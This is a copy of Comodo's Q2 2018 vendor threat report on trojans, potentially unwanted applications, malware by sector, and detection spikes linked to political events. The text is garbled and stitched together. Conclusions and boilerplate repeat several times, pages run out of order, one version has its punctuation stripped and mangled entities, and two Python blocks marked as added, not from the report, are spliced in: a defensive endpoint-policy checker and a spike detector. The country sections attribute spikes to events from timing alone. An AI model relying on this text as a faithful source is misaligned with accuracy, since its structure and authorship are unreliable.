The rise in trojan malware last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact revealed in quarters to come. Trojans also serve as a delivery vector for other types of malware. Together these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery, more sophisticated in its persistence and much harder for anti-virus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell to attack are clear evidence of this rise in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.
REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
NORTH AMERICA: Comodo Security Solutions Inc, 1255 Broad Street, Clifton NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
© 2018 All Rights Reserved. Comodo Security Solutions Inc. Visit comodo.com
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 55 of 73
5.3.4 Virtual Tools
Virtual Tools are programs that modify or alter malicious files so that they evade detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
The timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what the name says: applications that claim to take a malicious action but in fact are intended only as humor, or simply to annoy the user for a brief period.
Such programs are typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
The timeline shows that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover the range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and run such software deliberately. Comodo nevertheless detects and flags these applications as malicious because they exhibit behavior of which users may be unaware, including aggressive tracking of user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), the software is aggressive: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart shows that the US and Mexico were the countries in which Comodo most commonly detected applications of this type.
Finally, the timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming because users install these applications inadvertently in the course of ordinary computer and Internet use. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions the user did not intend. The bundles include free toolbars, adware and "system optimizers".
As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.
And as the timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
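The behaviours the report attributes to Elex in 5.4.1 (startup entries, added drivers, DNS changes) and to DealPly above (homepage and search-provider changes) can be turned into explicit checks against an organisation baseline. The block below is an added example, not code from the report or from Comodo: it assumes a hypothetical endpoint inventory (autostart entries, kernel drivers, configured resolvers and browser settings) and a hypothetical policy, and both sample hosts are constructed. Process injection and bundled-installer behaviour are deliberately not covered here, since a static inventory cannot show them; those need runtime telemetry.

```python
"""Check an endpoint inventory for the PUA behaviours described in 5.4.1-5.4.2.

Added example, not code from the Comodo report. The inventory layout, the
policy values and both sample hosts are constructed for illustration; map
the field names onto whatever your endpoint agent actually exports.
"""
import re

# Constructed baseline for a hypothetical organisation.
POLICY = {
    "dns_allowlist": {"10.0.0.53", "10.0.1.53"},
    "homepage": "https://intranet.example.test/",
    "search_provider": "https://search.example.test/q",
    "trusted_signers": {"Microsoft Windows", "Microsoft Corporation"},
}

# Legitimate autostart binaries rarely live in these locations.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.I)


def _signer_problem(entry, policy):
    """Reason string if the entry is unsigned or signed by an untrusted party."""
    signer = entry.get("signer")
    if not signer:
        return "unsigned"
    if signer not in policy["trusted_signers"]:
        return f"signer not in trusted set: {signer}"
    return None


def check_autostarts(entries, policy):
    """Startup entries that are unsigned, untrusted, or run from user-writable paths."""
    findings = []
    for e in entries:
        reasons = []
        problem = _signer_problem(e, policy)
        if problem:
            reasons.append(problem)
        if USER_WRITABLE.search(e["path"]):
            reasons.append("runs from user-writable path")
        if reasons:
            findings.append(("autostart", e["path"], "; ".join(reasons)))
    return findings


def check_drivers(drivers, policy):
    """Kernel drivers whose signer is missing or outside the trusted set."""
    findings = []
    for d in drivers:
        problem = _signer_problem(d, policy)
        if problem:
            findings.append(("driver", d["name"], problem))
    return findings


def check_dns(servers, policy):
    """Configured resolvers that are not on the organisation's allowlist."""
    return [("dns", s, "resolver not in allowlist")
            for s in servers if s not in policy["dns_allowlist"]]


def check_browser(settings, policy):
    """Homepage or default search provider changed away from policy."""
    findings = []
    for key in ("homepage", "search_provider"):
        if settings.get(key) != policy[key]:
            findings.append(("browser", key, f"expected {policy[key]}, found {settings.get(key)}"))
    return findings


def score_host(host, policy=POLICY):
    """All findings for one host as (category, item, reason); empty means nothing to review."""
    return (check_autostarts(host["autostart"], policy)
            + check_drivers(host["drivers"], policy)
            + check_dns(host["dns_servers"], policy)
            + check_browser(host["browser"], policy))


def suspicious_host():
    """Constructed host showing each behaviour the report attributes to Elex/DealPly."""
    return {
        "hostname": "ws-0417",  # constructed
        "autostart": [
            {"path": r"C:\Windows\System32\SecurityHealthSystray.exe", "signer": "Microsoft Windows"},
            {"path": r"C:\Users\alice\AppData\Roaming\Updater\upd.exe", "signer": None},  # constructed
        ],
        "drivers": [
            {"name": "tcpip", "path": r"C:\Windows\System32\drivers\tcpip.sys", "signer": "Microsoft Windows"},
            {"name": "netflt0", "path": r"C:\Windows\System32\drivers\netflt0.sys", "signer": "Example Adware Ltd"},  # constructed
        ],
        "dns_servers": ["10.0.0.53", "198.51.100.7"],  # second resolver is off-policy
        "browser": {"homepage": "https://deals.example.test/", "search_provider": "https://deals.example.test/q"},
    }


def clean_host():
    """Constructed host that matches policy on every check."""
    host = suspicious_host()
    host["autostart"] = host["autostart"][:1]
    host["drivers"] = host["drivers"][:1]
    host["dns_servers"] = ["10.0.0.53"]
    host["browser"] = {"homepage": POLICY["homepage"], "search_provider": POLICY["search_provider"]}
    return host


if __name__ == "__main__":
    for category, item, reason in score_host(suspicious_host()):
        print(f"{category:10s} {item:60s} {reason}")
```

The checks are deliberately baseline-driven rather than name-driven: a PUA family is renamed and re-signed far more often than it stops adding Run keys or changing resolvers, so comparing a host against what policy says it should look like ages better than a list of known product names.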
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft products. Such programs are referred to as "hacktools" and may be bundled with additional malware that users install inadvertently.
This malware type differs a little in geography: while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section we examine the distinct malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details the malware distribution for twenty-two vertical markets, from automotive to travel, across four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family within each vertical's top malware type.
Two trojans, Kryptik and Zbot, deserve a closer look: each was the top detection not in one but in several verticals, which makes them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now also targets email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit-count of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, Zbot, another name for the Zeus trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social engineering scheme that falsely claims the target's computer is already infected and needs to be cleaned.
In conclusion, trojans are dangerous malware found in every vertical and usable for a wide variety of cyberattacks. Strategic analysis of this kind can be used to build a distinct malware profile for each vertical and so provide cyber intelligence that clarifies the primary threats and focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 stands out. What happened in the US that day, and what might explain the surge in malware activity? On March 13 US President Donald Trump announced Mike Pompeo as his new Secretary of State and Gina Haspel as his new CIA Director. One plausible explanation for the rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, many of them requests for information on upcoming changes in US political, military and intelligence activity, and set about fulfilling those requirements through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 stands out as the single most prominent day. A likely reason for this spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract professional hackers seeking information that can serve as the basis for intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. That should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo's further research on the detected files identified them as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that most activity, from social life to business, politics and national security, now takes place online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to stop others from doing the same. This timeline shows that Armenia's 2018 political revolution was accompanied by Comodo's largest malware detection count in that country for Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". This timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018, offers some evidence for it. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April Iraq was preparing for a national election, including the question of how best to secure its electronic components. At the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons supplied by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the 2007 cyberattack on Estonia it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context the massive spike in malware detections in Croatia on March 28 is interesting: it came a day after the Russian government called Croatia's decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, consider Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Vantaa, the Helsinki suburb where the summit was scheduled to take place.
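The ten timelines in this section are read the same way: a day stands out by eye, and a same-day news event is offered as the likely cause. The block below is an added example, not code from the report or from Comodo, that makes the first step explicit and keeps the second honest. It flags days whose count is far above the series' median using a modified z-score built on the median absolute deviation (MAD), then pairs each flagged day with any known event within one day and reports spikes that have no candidate event at all. The daily counts, the planted spikes and the event list are constructed for illustration, not Comodo telemetry.

```python
"""Flag anomalous days in a daily malware-detection series and attribute them.

Added example, not code from the Comodo report. Counts, dates and events
below are constructed; the method is a standard robust outlier test.
"""
from datetime import date, timedelta
from statistics import median

MAD_TO_SIGMA = 1.4826   # MAD * 1.4826 estimates the standard deviation of normal data
SPIKE_THRESHOLD = 3.5   # common cutoff for a modified z-score


def constructed_counts():
    """Constructed series for one country, 1 Apr - 30 Jun 2018 (91 days).

    Baseline is 100-130 detections/day with deterministic jitter; three days
    are overwritten to plant two real spikes and one mild bump.
    """
    start = date(2018, 4, 1)
    series = {start + timedelta(days=i): 100 + (i * 37) % 31 for i in range(91)}
    series[date(2018, 5, 3)] = 1400   # planted spike with no matching event
    series[date(2018, 6, 4)] = 700    # planted spike on a constructed event day
    series[date(2018, 6, 20)] = 150   # mild bump; should stay below threshold
    return series


def modified_z_scores(series):
    """Return {day: modified z-score} using the median and MAD of the series."""
    values = list(series.values())
    med = median(values)
    mad = median(abs(v - med) for v in values)
    # A flat series has MAD == 0 and would divide by zero; fall back to the
    # mean absolute deviation, and to 1.0 if that is zero too.
    if mad == 0:
        mad = sum(abs(v - med) for v in values) / len(values) or 1.0
    scale = MAD_TO_SIGMA * mad
    return {day: (count - med) / scale for day, count in series.items()}


def find_spikes(series, threshold=SPIKE_THRESHOLD):
    """Days whose modified z-score exceeds the threshold, highest first."""
    scores = modified_z_scores(series)
    spikes = [(day, series[day], round(z, 1)) for day, z in scores.items() if z > threshold]
    return sorted(spikes, key=lambda row: row[2], reverse=True)


def attribute_spikes(spikes, events, window_days=1):
    """Pair each spike with any known event within +/- window_days.

    A match is a candidate explanation only: same-day timing does not show
    that the event caused the detections, and a spike with no candidate is
    just as real as one with a tidy story attached.
    """
    rows = []
    for day, count, z in spikes:
        nearby = sorted(f"{e_day}: {label}" for e_day, label in events.items()
                        if abs((e_day - day).days) <= window_days)
        rows.append({"day": day, "count": count, "z": z, "candidate_events": nearby})
    return rows


if __name__ == "__main__":
    events = {date(2018, 6, 4): "constructed event (illustrative only)"}
    for row in attribute_spikes(find_spikes(constructed_counts()), events):
        tag = "; ".join(row["candidate_events"]) or "no known event within window"
        print(f'{row["day"]}  count={row["count"]:5d}  z={row["z"]:6.1f}  {tag}')
```

Two points matter in practice. The median and MAD are used instead of the mean and standard deviation because a single enormous day would otherwise inflate the standard deviation enough to hide the second spike. And a matched event is a hypothesis to investigate, not a finding: per-country detection counts also move with the size of the installed sensor base, with weekday cycles and with ordinary mass-mailing campaigns, so the step taken in the North Korea subsection (looking at what the detected files actually were) is what turns a coincidence into evidence.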
8 Conclusions
In Q2 2018 Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only show an upswing in malware across the world but point to possible future scenarios.
The increase in trojan malware last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the industry should assume that many trojan-based attacks from Q2 remain undetected, with their real impact revealed in quarters to come. Trojans also serve as a delivery vector for other types of malware. Taken together, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell for attacks are clear evidence of this.
Mobile devices are becoming more attractive targets because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware. As more people use mobile devices for financial transactions (banking and e-payment apps) and to store confidential information (messenger correspondence, private pictures), cybercriminals can anticipate rich pickings from compromising those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals' accelerating focus on hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.
© 2018 All Rights Reserved, Comodo Security Solutions, Inc. Visit comodo.com.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 56 of 73
5.3.5 Jokes

"Joke" malware is in fact just what it says: non-malicious applications that claim to take a malicious action when they are only intended as humor, or simply to annoy the user for a brief period of time. Such programs are typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware. The timeline shows that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we cover the range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and run such software on purpose. Comodo nevertheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft classifies Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior, and modify DNS settings.

The bubble chart shows that the US and Mexico were the most common countries in which Comodo detected this type of Application. The timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications

